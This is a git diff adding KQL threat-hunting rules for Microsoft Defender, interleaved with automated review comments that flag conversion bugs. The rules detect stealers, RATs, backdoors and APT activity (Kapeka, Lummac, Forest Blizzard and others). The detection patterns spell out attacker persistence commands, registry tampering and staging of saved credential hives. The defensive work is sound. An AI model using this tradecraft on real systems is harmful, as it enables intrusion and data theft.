+// Tags: attack.execution, attack.t1059, detection.emerging-threats
+// False Positives:
+// - Unlikely legitimate usage of AutoIT in temp folders.
+
+DeviceFileEvents
+| where (FolderPath contains ":\\temp\\" and (FolderPath endswith ".au3" or FolderPath endswith "\\autoit3.exe")) or (InitiatingProcessFolderPath contains ":\\temp\\" and (InitiatingProcessFolderPath endswith ".au3" or InitiatingProcessFolderPath endswith "\\autoit3.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/Generic/file_creation_related_to_rat_clients.kql b/KQL/rules-emerging-threats/2024/Malware/Generic/file_creation_related_to_rat_clients.kql
new file mode 100644
index 00000000..e28c09b4
--- /dev/null
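Review bot: The regex in the CSharp Streamer `where` clause is unanchored at the end, so `\AppData\Local\Temp\datABCD.tmp.exe` or `...\datABCD.tmpx` match as readily as the intended `datABCD.tmp`; appending `$` pins it to the file name: `FolderPath matches regex "\\\\AppData\\\\Local\\\\Temp\\\\dat[0-9A-Z]{4}\\.tmp$"`. Note also that `matches regex` is case-sensitive while every other operator in these generated rules (`contains`, `endswith`, `startswith`) is case-insensitive, so a differently cased `appdata\local\temp` would be missed here but matched elsewhere; if the upstream rule intends case-insensitive path matching, an `(?i)` prefix restores consistency. The `[a-zA-Z]{5,6}\\.wll` regexes in kapeka_backdoor_loaded_via_rundll32_exe.kql and potential_kapeka_decrypted_backdoor_indicator.kql have the same unanchored tail and case-sensitive extension; since these files are generated, the converter's regex emission is the place to fix it.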
+++ b/KQL/rules-emerging-threats/2024/Malware/Generic/file_creation_related_to_rat_clients.kql
@@ -0,0 +1,12 @@
+// Title: File Creation Related To RAT Clients
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-12-19
+// Level: high
+// Description: File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Legitimate software creating a file with the same name
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Roaming\\" and ((FolderPath contains "\\mydata\\" or FolderPath contains "\\datalogs\\" or FolderPath contains "\\hvnc\\" or FolderPath contains "\\dcrat\\") and (FolderPath endswith "\\datalogs.conf" or FolderPath endswith "\\hvnc.conf" or FolderPath endswith "\\dcrat.conf"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_lure_document_execution.kql b/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_lure_document_execution.kql
new file mode 100644
index 00000000..bef6bc6f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_lure_document_execution.kql
@@ -0,0 +1,11 @@
+// Title: Potential KamiKakaBot Activity - Lure Document Execution
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2024-03-22
+// Level: medium
+// Description: Detects the execution of a Word document via the WinWord Start Menu shortcut.
+// This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/c " and ProcessCommandLine contains ".lnk ~" and ProcessCommandLine contains "Start Menu\\Programs\\Word") and ProcessCommandLine endswith ".doc" and FolderPath endswith "\\cmd.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql b/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql
new file mode 100644
index 00000000..697c24cb
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql
@@ -0,0 +1,11 @@
+// Title: Potential KamiKakaBot Activity - Shutdown Schedule Task Creation
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2024-03-22
+// Level: medium
+// Description: Detects the creation of a schedule task that runs weekly and execute the "shutdown /l /f" command.
+// This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " /create " and ProcessCommandLine contains "shutdown /l /f" and ProcessCommandLine contains "WEEKLY") and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_winlogon_shell_persistence.kql b/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_winlogon_shell_persistence.kql
new file mode 100644
index 00000000..768174f9
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_winlogon_shell_persistence.kql
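Review bot: The exclusion `not((AccountName contains "AUTHORI" or AccountName contains "AUTORI"))` is a Sysmon `User` idiom (`NT AUTHORITY\...` and its localised forms) that does not carry over to `DeviceProcessEvents`, where the domain part lives in `AccountDomain` and `AccountName` for the built-in accounts is typically just the short name (e.g. `system`); as written the filter most likely excludes nothing, so the rule keeps the SYSTEM-owned task creations it was meant to drop. Matching the domain column, `not((AccountDomain contains "AUTHORI" or AccountDomain contains "AUTORI"))`, restores the intent. If the converter maps Sigma's `User` field to `AccountName` generally, that mapping is where to fix it.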
@@ -0,0 +1,12 @@
+// Title: Potential KamiKakaBot Activity - Winlogon Shell Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior
+// Date: 2024-03-22
+// Level: high
+// Description: Detects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "-nop -w h" and RegistryValueData contains "$env" and RegistryValueData contains "explorer.exe" and RegistryValueData contains "Start-Process") and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/Lummac-Stealer/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql b/KQL/rules-emerging-threats/2024/Malware/Lummac-Stealer/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql
new file mode 100644
index 00000000..c2c2117e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/Lummac-Stealer/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql
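Review bot: `RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell"` will not match in `DeviceRegistryEvents`: Sysmon's `TargetObject` appends the value name to the key path, but MDE keeps the key in `RegistryKey` and the value name in the separate `RegistryValueName` column, so the trailing `\Shell` never appears in `RegistryKey` and the rule is dead. The condition should read `RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" and RegistryValueName =~ "Shell"`. The same key/value-name split breaks the `\\AutoDetect`, `\\IntranetName`, `\\ProxyByPass` and `\\UNCAsIntranet` suffixes in the Raspberry Robin ZoneMap hunk, the `\\Sens Api`/`\\OneDrive` and `\\Seed` suffixes in the two Kapeka registry hunks, and probably the `\\rogue\\CLSID` suffix in the Forest Blizzard handler-creation hunk; as these files are generated, the converter's `TargetObject` mapping is the place to fix it.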
@@ -0,0 +1,12 @@
+// Title: Lummac Stealer Activity - Execution Of More.com And Vbc.exe
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-12-19
+// Level: high
+// Description: Detects the execution of more.com and vbc.exe in the process tree.
+// This behavior was observed by a set of samples related to Lummac Stealer.
+// The Lummac payload is injected into the vbc.exe process.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\vbc.exe" or ProcessVersionInfoOriginalFileName =~ "vbc.exe") and InitiatingProcessFolderPath endswith "\\more.com"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/Raspberry-Robin/potential_raspberry_robin_cpl_execution_activity.kql b/KQL/rules-emerging-threats/2024/Malware/Raspberry-Robin/potential_raspberry_robin_cpl_execution_activity.kql
new file mode 100644
index 00000000..19eb8fcc
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/Raspberry-Robin/potential_raspberry_robin_cpl_execution_activity.kql
@@ -0,0 +1,11 @@
+// Title: Potential Raspberry Robin CPL Execution Activity
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-03-07
+// Level: high
+// Description: Detects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function.
+// This behavior was observed in multiple Raspberry-Robin variants.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL" and ProcessCommandLine contains ".CPL") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\control.exe") and ProcessCommandLine contains "\\AppData\\Local\\Temp\\"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/Raspberry-Robin/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql b/KQL/rules-emerging-threats/2024/Malware/Raspberry-Robin/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql
new file mode 100644
index 00000000..cdbe156e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/Raspberry-Robin/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql
@@ -0,0 +1,11 @@
+// Title: Potential Raspberry Robin Registry Set Internet Settings ZoneMap
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-07-31
+// Level: low
+// Description: Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024.
+// Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion, detection.emerging-threats
+
+DeviceRegistryEvents
+| where (((InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Downloads\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\") or InitiatingProcessFolderPath endswith "\\control.exe") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap*") and ((RegistryValueData contains "DWORD (0x00000000)" and RegistryKey endswith "\\AutoDetect") or (RegistryValueData contains "DWORD (0x00000001)" and (RegistryKey endswith "\\IntranetName" or RegistryKey endswith "\\ProxyByPass" or RegistryKey endswith "\\UNCAsIntranet")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_autorun_persistence.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_autorun_persistence.kql
new file mode 100644
index 00000000..ad21478e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_autorun_persistence.kql
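Review bot: `RegistryValueData contains "DWORD (0x00000000)"` and `"DWORD (0x00000001)"` are Sysmon `Details` renderings; in `DeviceRegistryEvents` the column holds the value itself and the type is reported separately in `RegistryValueType`, so neither string can ever appear and the entire second conjunct of the `where` clause is dead. A faithful translation tests the raw value, `RegistryValueData == "0"` and `RegistryValueData == "1"` respectively, with `RegistryValueType` carrying the DWORD check if it is wanted. Since the file is generated, the converter needs a rule for Sigma `Details` patterns of this shape rather than a hand edit here.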
@@ -0,0 +1,10 @@
+// Title: Kapeka Backdoor Autorun Persistence
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-07-03
+// Level: high
+// Description: Detects the setting of a new value in the Autorun key that is used by the Kapeka backdoor for persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+
+DeviceRegistryEvents
+| where (RegistryValueData contains ":\\WINDOWS\\system32\\rundll32.exe" and RegistryValueData contains ".wll" and RegistryValueData contains "#1") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" and (RegistryKey endswith "\\Sens Api" or RegistryKey endswith "\\OneDrive")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_configuration_persistence.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_configuration_persistence.kql
new file mode 100644
index 00000000..01d34437
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_configuration_persistence.kql
@@ -0,0 +1,11 @@
+// Title: Kapeka Backdoor Configuration Persistence
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-07-03
+// Level: medium
+// Description: Detects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers\" registry key.
+// The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1553.003, detection.emerging-threats
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\{" and RegistryKey endswith "\\Seed") and (not(RegistryValueData contains "(Empty)"))
\ No newline at end of file
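Review bot: In the configuration-persistence hunk, `not(RegistryValueData contains "(Empty)")` tests for the placeholder text Sysmon writes into `Details` when a value is empty; `DeviceRegistryEvents` simply leaves `RegistryValueData` empty, so the filter never excludes anything and empty-value writes to the `\Seed` value are reported along with real ones. The MDE equivalent is `isnotempty(RegistryValueData)`. This is another Sysmon-specific `Details` convention the converter should translate rather than copy through.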
diff --git a/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_execution_via_rundll32_exe.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_execution_via_rundll32_exe.kql
new file mode 100644
index 00000000..2b16cf5e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_execution_via_rundll32_exe.kql
@@ -0,0 +1,10 @@
+// Title: Kapeka Backdoor Execution Via RunDLL32.EXE
+// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-03
+// Level: high
+// Description: Detects Kapeka backdoor process execution pattern, where the dropper launch the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a "-d" argument.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (ProcessCommandLine contains ":\\ProgramData" or ProcessCommandLine contains "\\AppData\\Local") and ((ProcessCommandLine contains ".wll" and ProcessCommandLine contains "#1" and ProcessCommandLine contains " -d") or (ProcessCommandLine contains ".wll" and ProcessCommandLine endswith "#1"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_loaded_via_rundll32_exe.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_loaded_via_rundll32_exe.kql
new file mode 100644
index 00000000..c6787dd2
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_loaded_via_rundll32_exe.kql
@@ -0,0 +1,11 @@
+// Title: Kapeka Backdoor Loaded Via Rundll32.EXE
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-07-03
+// Level: high
+// Description: Detects the Kapeka Backdoor binary being loaded by rundll32.exe.
+// The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002, attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceImageLoadEvents
+| where (FolderPath contains ":\\ProgramData" or FolderPath contains "\\AppData\\Local\\") and FolderPath matches regex "[a-zA-Z]{5,6}\\.wll" and InitiatingProcessFolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_persistence_activity.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_persistence_activity.kql
new file mode 100644
index 00000000..a11223a9
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_persistence_activity.kql
@@ -0,0 +1,16 @@
+// Title: Kapeka Backdoor Persistence Activity
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-07-03
+// Level: high
+// Description: Detects Kapeka backdoor persistence activity.
+// Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not).
+// For the scheduled task, it creates a scheduled task called "Sens Api" via schtasks command, which is set to run upon system startup as SYSTEM.
+// To establish persistence through the autorun utility, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command.
+// Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "create" and ProcessCommandLine contains "ONSTART") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) or ((ProcessCommandLine contains "add" and ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe"))) and ((ProcessCommandLine contains "Sens Api" or ProcessCommandLine contains "OneDrive") and (ProcessCommandLine contains "rundll32" and ProcessCommandLine contains ".wll" and ProcessCommandLine contains "#1"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/Malware/kapeka/potential_kapeka_decrypted_backdoor_indicator.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/potential_kapeka_decrypted_backdoor_indicator.kql
new file mode 100644
index 00000000..5115222b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/Malware/kapeka/potential_kapeka_decrypted_backdoor_indicator.kql
@@ -0,0 +1,11 @@
+// Title: Potential Kapeka Decrypted Backdoor Indicator
+// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-03
+// Level: high
+// Description: Detects the presence of a file that is decrypted backdoor binary dropped by the Kapeka Dropper, which disguises itself as a hidden file under a folder named "Microsoft" within "CSIDL_COMMON_APPDATA" or "CSIDL_LOCAL_APPDATA", depending on the process privileges.
+// The file, typically 5-6 characters long with a random combination of consonants and vowels followed by a ".wll" extension to pose as a legitimate file to evade detection.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.emerging-threats
+
+DeviceFileEvents
+| where ((FolderPath contains ":\\ProgramData\\" or FolderPath contains "\\AppData\\Local\\") and FolderPath matches regex "\\\\[a-zA-Z]{5,6}\\.wll") or (FolderPath endswith "\\win32log.exe" or FolderPath endswith "\\crdss.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/TA/FIN7/potential_apt_fin7_exploitation_activity.kql b/KQL/rules-emerging-threats/2024/TA/FIN7/potential_apt_fin7_exploitation_activity.kql
new file mode 100644
index 00000000..ffde7472
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/TA/FIN7/potential_apt_fin7_exploitation_activity.kql
@@ -0,0 +1,13 @@
+// Title: Potential APT FIN7 Exploitation Activity
+// Author: Alex Walston (@4ayymm)
+// Date: 2024-07-29
+// Level: medium
+// Description: Detects potential APT FIN7 exploitation activity as reported by Google.
+// In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.t1059.003, detection.emerging-threats
+// False Positives:
+// - Notepad++ can legitimately spawn cmd (Open Containing Folder in CMD)
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\notepad++.exe") or (FolderPath endswith "\\notepad++.exe" and InitiatingProcessFolderPath endswith "\\rdpinit.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_custom_protocol_handler_creation.kql b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_custom_protocol_handler_creation.kql
new file mode 100644
index 00000000..e6427e64
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_custom_protocol_handler_creation.kql
@@ -0,0 +1,13 @@
+// Title: Forest Blizzard APT - Custom Protocol Handler Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-04-23
+// Level: high
+// Description: Detects the setting of a custom protocol handler with the name "rogue".
+// Seen being created by Forest Blizzard APT as reported by MSFT.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "{026CC6D7-34B2-33D5-B551-CA31EB6CE345}" and RegistryKey contains "\\PROTOCOLS\\Handler\\rogue\\CLSID"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql
new file mode 100644
index 00000000..171a3356
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql
@@ -0,0 +1,13 @@
+// Title: Forest Blizzard APT - Custom Protocol Handler DLL Registry Set
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-04-23
+// Level: high
+// Description: Detects the setting of the DLL that handles the custom protocol handler.
+// Seen being created by Forest Blizzard APT as reported by MSFT.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryValueData endswith ".dll" and RegistryKey contains "\\CLSID\\{026CC6D7-34B2-33D5-B551-CA31EB6CE345}\\Server"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_file_creation_activity.kql b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_file_creation_activity.kql
new file mode 100644
index 00000000..3f7ccead
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_file_creation_activity.kql
@@ -0,0 +1,13 @@
+// Title: Forest Blizzard APT - File Creation Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-04-23
+// Level: high
+// Description: Detects the creation of specific files inside of ProgramData directory.
+// These files were seen being created by Forest Blizzard as described by MSFT.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where ((FolderPath contains "\\prnms003.inf_" or FolderPath contains "\\prnms009.inf_") and (FolderPath startswith "C:\\ProgramData\\Microsoft\\v" or FolderPath startswith "C:\\ProgramData\\Adobe\\v" or FolderPath startswith "C:\\ProgramData\\Comms\\v" or FolderPath startswith "C:\\ProgramData\\Intel\\v" or FolderPath startswith "C:\\ProgramData\\Kaspersky Lab\\v" or FolderPath startswith "C:\\ProgramData\\Bitdefender\\v" or FolderPath startswith "C:\\ProgramData\\ESET\\v" or FolderPath startswith "C:\\ProgramData\\NVIDIA\\v" or FolderPath startswith "C:\\ProgramData\\UbiSoft\\v" or FolderPath startswith "C:\\ProgramData\\Steam\\v")) or (FolderPath startswith "C:\\ProgramData\\" and ((FolderPath endswith ".save" or FolderPath endswith "\\doit.bat" or FolderPath endswith "\\execute.bat" or FolderPath endswith "\\servtask.bat") or (FolderPath contains "\\wayzgoose" and FolderPath endswith ".dll")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_javascript_constrained_file_creation.kql b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_javascript_constrained_file_creation.kql
new file mode 100644
index 00000000..bc45385d
--- /dev/null
+++ b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_javascript_constrained_file_creation.kql
@@ -0,0 +1,13 @@ +// Title: Forest Blizzard APT - JavaScript Constrained File Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-04-23 +// Level: medium +// Description: Detects the creation of JavaScript files inside of the DriverStore directory. +// Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath endswith "\\.js" and FolderPath startswith "C:\\Windows\\System32\\DriverStore\\FileRepository\\" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_process_creation_activity.kql b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_process_creation_activity.kql new file mode 100644 index 00000000..3daa2658 --- /dev/null +++ b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_process_creation_activity.kql 
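Review bot: `FolderPath endswith "\\.js"` matches only a file whose name is literally `.js` (a backslash immediately followed by `.js`), not JavaScript files in general, so the constraints file the description talks about would never be caught. If any `.js` under `FileRepository` is the intent, the condition should read `FolderPath endswith ".js"`; if the backslash is present in the upstream Sigma rule, it belongs fixed there rather than patched in the generated output. Driver packages can legitimately ship script files into the DriverStore, so expect some baseline once the match is corrected — I have not measured how common that is.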
@@ -0,0 +1,11 @@ +// Title: Forest Blizzard APT - Process Creation Activity +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-04-23 +// Level: high +// Description: Detects the execution of specific processes and command line combination. +// These were seen being created by Forest Blizzard as described by MSFT. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats + +DeviceProcessEvents +| where (SHA256 startswith "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f" or SHA256 startswith "c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5") or (ProcessCommandLine contains "Get-ChildItem" and ProcessCommandLine contains ".save" and ProcessCommandLine contains "Compress-Archive -DestinationPath C:\\ProgramData\\") or ((ProcessCommandLine contains "servtask.bat" or ProcessCommandLine contains "execute.bat" or ProcessCommandLine contains "doit.bat") and (ProcessCommandLine contains "Create" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "SYSTEM" and ProcessCommandLine contains "\\Microsoft\\Windows\\WinSrv") and FolderPath endswith "\\schtasks.exe") or ((ProcessCommandLine contains "Delete" and ProcessCommandLine contains "/F " and ProcessCommandLine contains "\\Microsoft\\Windows\\WinSrv") and FolderPath endswith "\\schtasks.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2024/TA/SlashAndGrab-Exploitation-In-Wild/screenconnect_slashandgrab_exploitation_indicators.kql b/KQL/rules-emerging-threats/2024/TA/SlashAndGrab-Exploitation-In-Wild/screenconnect_slashandgrab_exploitation_indicators.kql new file mode 100644 index 00000000..5175147d --- /dev/null +++ b/KQL/rules-emerging-threats/2024/TA/SlashAndGrab-Exploitation-In-Wild/screenconnect_slashandgrab_exploitation_indicators.kql 
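Review bot: The hash branch uses `SHA256 startswith "<64 hex chars>"`, which for a full-length literal is an equality test written as a prefix match; `SHA256 in~ ("6b311c0a…0b052f", "c60ead92…24c2a5")` states the intent directly and keeps the list easy to extend. Whether `startswith` was picked to tolerate a `SHA256=` prefix from the Sigma `Hashes` field I cannot tell from here; in DeviceProcessEvents the `SHA256` column holds the bare hash. The schtasks and `Compress-Archive` branches read consistently with the described TTPs.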
